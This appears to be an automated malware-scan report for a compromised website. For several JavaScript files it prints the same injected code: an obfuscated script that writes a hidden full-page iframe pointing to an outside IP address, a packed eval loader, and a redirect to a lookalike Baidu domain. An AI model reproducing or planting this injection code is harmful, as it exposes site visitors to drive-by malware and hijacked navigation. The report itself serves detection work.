Scanned pages/files
Request | Server response | Status |
http://artis-www.yuantupump.com/ | 200 OK Content-Length: 13720 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp1878.js?vi=9334 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport112/ | 200 OK Content-Length: 10507 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp7215.js?vi=1524 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://artis-www.yuantupump.com/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/sport91/ | 200 OK Content-Length: 10073 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp9382.js?vi=4212 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport22/ | 200 OK Content-Length: 11340 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp6053.js?vi=9553 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport01/ | 200 OK Content-Length: 10370 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp7861.js?vi=7168 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport41/ | 200 OK Content-Length: 10424 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp3836.js?vi=3176 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport52/ | 200 OK Content-Length: 10952 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp4432.js?vi=2450 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: artis-www.yuantupump.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Apr 2014 19:25:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.17
GET / HTTP/1.1
Host: artis-www.yuantupump.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Apr 2014 19:25:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: artis-www.yuantupump.com
Referer: http://www.google.com/search?q=artis-www.yuantupump.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: artis-www.yuantupump.com
Referer: http://www.google.com/search?q=artis-www.yuantupump.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=artis-www.yuantupump.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://artis-www.yuantupump.com/
Result: artis-www.yuantupump.com is not infected or malware details are not published yet.
Result: artis-www.yuantupump.com is not infected or malware details are not published yet.